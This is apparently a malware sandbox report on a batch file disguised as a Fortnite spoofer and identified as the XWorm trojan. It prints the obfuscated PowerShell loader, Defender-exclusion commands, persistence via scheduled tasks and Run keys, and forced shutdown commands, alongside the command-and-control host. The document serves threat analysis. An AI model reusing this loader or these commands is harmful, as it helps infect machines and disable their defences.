Analysis
-
max time kernel
246s -
max time network
247s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-01-2025 18:40
Static task
static1
Behavioral task
behavioral1
Sample
SpooferFornite.bat
Resource
win11-20241007-en
Errors
General
-
Target
SpooferFornite.bat
-
Size
289KB
-
MD5
1776b4ed272a4c874cb62d3827da9330
-
SHA1
15611ee351e8fdb75b6d65fb5a2e111c3fed6b2e
-
SHA256
9b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7
-
SHA512
e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e
-
SSDEEP
6144:TO/Pb0ZIWr3AuGHdOOJvpW2hZkewDbShSj2+AoACcSc2hJaDeAnul2xojol9r:TO/bTNHdxW2rkewDbc8cH/x4o3r
Malware Config
Extracted
xworm
IDKTOBEHONESTNIGAS-56344.portmap.io:56344
-
Install_directory
%ProgramData%
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4948-48-0x000002462BA50000-0x000002462BA66000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 64 IoCs
flow pid Process 2 4948 powershell.exe 3 4948 powershell.exe 4 4948 powershell.exe 5 4948 powershell.exe 6 4948 powershell.exe 7 4948 powershell.exe 8 4948 powershell.exe 9 4948 powershell.exe 10 4948 powershell.exe 11 4948 powershell.exe 12 4948 powershell.exe 13 4948 powershell.exe 14 4948 powershell.exe 15 4948 powershell.exe 16 4948 powershell.exe 17 4948 powershell.exe 18 4948 powershell.exe 19 4948 powershell.exe 20 4948 powershell.exe 21 4948 powershell.exe 22 4948 powershell.exe 23 4948 powershell.exe 24 4948 powershell.exe 25 4948 powershell.exe 26 4948 powershell.exe 27 4948 powershell.exe 28 4948 powershell.exe 29 4948 powershell.exe 30 4948 powershell.exe 31 4948 powershell.exe 32 4948 powershell.exe 33 4948 powershell.exe 34 4948 powershell.exe 35 4948 powershell.exe 36 4948 powershell.exe 37 4948 powershell.exe 38 4948 powershell.exe 39 4948 powershell.exe 40 4948 powershell.exe 41 4948 powershell.exe 42 4948 powershell.exe 43 4948 powershell.exe 44 4948 powershell.exe 45 4948 powershell.exe 46 4948 powershell.exe 47 4948 powershell.exe 48 4948 powershell.exe 49 4948 powershell.exe 50 4948 powershell.exe 51 4948 powershell.exe 52 4948 powershell.exe 53 4948 powershell.exe 55 4948 powershell.exe 56 4948 powershell.exe 57 4948 powershell.exe 58 4948 powershell.exe 59 4948 powershell.exe 60 4948 powershell.exe 61 4948 powershell.exe 62 4948 powershell.exe 63 4948 powershell.exe 64 4948 powershell.exe 65 4948 powershell.exe 66 4948 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4536 powershell.exe 4876 powershell.exe 1964 powershell.exe 4368 powershell.exe 1156 powershell.exe 4948 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3716 powershell.exe 2848 powershell.exe 4532 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 240 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "217" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1904 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4948 powershell.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1156 powershell.exe 1156 powershell.exe 4368 powershell.exe 4368 powershell.exe 4948 powershell.exe 4948 powershell.exe 4536 powershell.exe 4536 powershell.exe 4876 powershell.exe 4876 powershell.exe 1964 powershell.exe 1964 powershell.exe 3716 powershell.exe 3716 powershell.exe 2848 powershell.exe 2848 powershell.exe 4532 powershell.exe 4532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe Token: 34 4368 powershell.exe Token: 35 4368 powershell.exe Token: 36 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe Token: 34 4368 powershell.exe Token: 35 4368 powershell.exe Token: 36 4368 powershell.exe Token: SeIncreaseQuotaPrivilege 4368 powershell.exe Token: SeSecurityPrivilege 4368 powershell.exe Token: SeTakeOwnershipPrivilege 4368 powershell.exe Token: SeLoadDriverPrivilege 4368 powershell.exe Token: SeSystemProfilePrivilege 4368 powershell.exe Token: SeSystemtimePrivilege 4368 powershell.exe Token: SeProfSingleProcessPrivilege 4368 powershell.exe Token: SeIncBasePriorityPrivilege 4368 powershell.exe Token: SeCreatePagefilePrivilege 4368 powershell.exe Token: SeBackupPrivilege 4368 powershell.exe Token: SeRestorePrivilege 4368 powershell.exe Token: SeShutdownPrivilege 4368 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeSystemEnvironmentPrivilege 4368 powershell.exe Token: SeRemoteShutdownPrivilege 4368 powershell.exe Token: SeUndockPrivilege 4368 powershell.exe Token: SeManageVolumePrivilege 4368 powershell.exe Token: 33 4368 powershell.exe Token: 34 4368 powershell.exe Token: 35 4368 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4948 powershell.exe 3704 LogonUI.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2208 wrote to memory of 1156 2208 cmd.exe 78 PID 2208 wrote to memory of 1156 2208 cmd.exe 78 PID 1156 wrote to memory of 4368 1156 powershell.exe 79 PID 1156 wrote to memory of 4368 1156 powershell.exe 79 PID 1156 wrote to memory of 4440 1156 powershell.exe 82 PID 1156 wrote to memory of 4440 1156 powershell.exe 82 PID 4440 wrote to memory of 800 4440 WScript.exe 83 PID 4440 wrote to memory of 800 4440 WScript.exe 83 PID 800 wrote to memory of 4948 800 cmd.exe 85 PID 800 wrote to memory of 4948 800 cmd.exe 85 PID 4948 wrote to memory of 4536 4948 powershell.exe 86 PID 4948 wrote to memory of 4536 4948 powershell.exe 86 PID 4948 wrote to memory of 4876 4948 powershell.exe 88 PID 4948 wrote to memory of 4876 4948 powershell.exe 88 PID 4948 wrote to memory of 1964 4948 powershell.exe 90 PID 4948 wrote to memory of 1964 4948 powershell.exe 90 PID 4948 wrote to memory of 1904 4948 powershell.exe 92 PID 4948 wrote to memory of 1904 4948 powershell.exe 92 PID 4948 wrote to memory of 240 4948 powershell.exe 98 PID 4948 wrote to memory of 240 4948 powershell.exe 98 PID 4948 wrote to memory of 2668 4948 powershell.exe 103 PID 4948 wrote to memory of 2668 4948 powershell.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_896.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_896.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_896.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_896.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1964
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1904
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe6⤵
- Kills process with taskkill
PID:240
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /s /t 06⤵PID:2668
-
-
-
-
-
-
C:\ProgramData\powershell.exeC:\ProgramData\powershell.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3716
-
C:\ProgramData\powershell.exeC:\ProgramData\powershell.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D01⤵PID:3148
-
C:\ProgramData\powershell.exeC:\ProgramData\powershell.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4532
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3952055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3704
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD5c81d47c3b95d180e012e8380740c4349
SHA1702eded5bde64ab869985b0934655e18dbdc6a70
SHA256cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc
SHA512982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1
-
Filesize
1KB
MD513ef30e34b94ea33ab4d9fe62b5c3957
SHA1fc16df86061fd69b1880b425cb5d495c8ba346ba
SHA256e7838f2f4cb769049d9073a31a06242c14df2fbd6f349575cfdc093c8df87ff1
SHA51258200a222466e172879760f2978a30f3c5a2ccb7e696bb664b3f7e020a55c0e580404daac0e6576d7836c6368b557e1fba4732acc957795402cfa3b2e2d7ad53
-
Filesize
1KB
MD559d37a8c588c83e806678c7fb5d1229f
SHA14396d68567f30f08e08a269802fe3f4784b88c5b
SHA256c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84
SHA51219223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD5190b28f40c0edd3cc08d0fd3aca4779a
SHA1425b98532b6a18aa2baece47605f1cf6c8cfbd11
SHA2568a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce
SHA5128d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
289KB
MD51776b4ed272a4c874cb62d3827da9330
SHA115611ee351e8fdb75b6d65fb5a2e111c3fed6b2e
SHA2569b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7
SHA512e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e
-
Filesize
115B
MD5e3516fa0556c66f2688fdb20ca215efa
SHA175cab0b89b7f62ecc2a44b804b4f120977abcd71
SHA256790d99e90285df45fa2258ba8e4fbe72b3dd9b67670ad1c2a1d7f72bcda37b20
SHA51218903ce89076c61eb58d870ab85fae7ff5d5f45103368928caef05432548f9780cf3ab6b59bd6bc448e6874d2e358951a58e02e2df127c84a093e3f044443462